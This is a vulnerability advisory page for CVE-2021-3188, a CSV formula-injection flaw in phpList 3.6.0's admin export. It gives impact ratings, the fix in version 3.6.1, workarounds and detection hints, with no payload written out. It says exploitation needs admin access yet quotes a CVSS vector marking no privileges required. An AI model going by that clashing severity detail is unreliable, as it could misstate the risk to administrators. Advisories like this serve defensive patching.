CVE-2021-3188 – CVE-2021-3188 is a CSV injection vulnerability ... (How to Fix)

Q: What is the severity of CVE-2021-3188?

CVE-2021-3188 has a CVSS score of 9.8 (CRITICAL). CVE-2021-3188 is a CSV injection vulnerability in phpList 3.6.0 that allows attackers to inject malicious formulas into exported CSV files via the email parameter. When victims open these CSV files in spreadsheet applications like Excel, the formulas execute, potentially leading to command execution or data theft. This affects all phpList 3.6.0 installations with admin export functionality enabled.

📋 TL;DR

CVE-2021-3188 is a CSV injection vulnerability in phpList 3.6.0 that allows attackers to inject malicious formulas into exported CSV files via the email parameter. When victims open these CSV files in spreadsheet applications like Excel, the formulas execute, potentially leading to command execution or data theft. This affects all phpList 3.6.0 installations with admin export functionality enabled.

💻 Affected Systems

Products:

phpList

Versions: 3.6.0

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires admin access to export functionality at /lists/admin/exports

📦 What is this software?

Phplist by Phplist

View all CVEs affecting Phplist →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers achieve remote code execution on victim machines when malicious CSV files are opened in vulnerable spreadsheet applications, potentially compromising entire systems and networks.

🟠

Likely Case

Attackers steal sensitive data or execute limited commands on victim workstations when users open manipulated CSV exports in spreadsheet software.

🟢

If Mitigated

With proper user training and security controls, impact is limited to potential data leakage from exported files.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires admin access to phpList and victim interaction with CSV files

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.6.1

Vendor Advisory: https://www.phplist.org/news/phplist-3-6-1-release-notes/

Restart Required: No

Instructions:

1. Backup your phpList installation and database. 2. Download phpList 3.6.1 from official sources. 3. Replace existing files with new version. 4. Run database update if required. 5. Verify functionality.

🔧 Temporary Workarounds

Disable CSV Export

all

Temporarily disable CSV export functionality in admin interface

Input Sanitization

all

Add custom validation to sanitize email parameter inputs before export

🧯 If You Can't Patch

Restrict admin access to trusted users only
Educate users to never open CSV files directly in spreadsheet applications - use text editors or import with data-only settings

🔍 How to Verify

Check if Vulnerable:

Check phpList version in admin interface or config.php file for version 3.6.0

Check Version:

grep 'VERSION' /path/to/phplist/config/config.php

Verify Fix Applied:

Verify phpList version shows 3.6.1 or higher in admin interface

📡 Detection & Monitoring

Log Indicators:

Unusual CSV export activity from admin accounts
Multiple failed export attempts

Network Indicators:

CSV file downloads from /lists/admin/exports endpoint

SIEM Query:

source="phpList" AND (uri="/lists/admin/exports" OR filetype="csv")

📊 Metadata

CVE ID: CVE-2021-3188

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-1236

Published: January 26, 2021

Last Updated: November 21, 2024

🔗 References

https://wehackmx.com/security-research/WeHackMX-2021-001/ Exploit,Third Party Advisory
https://wehackmx.com/security-research/WeHackMX-2021-001/ Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-3188, you might also want to check these: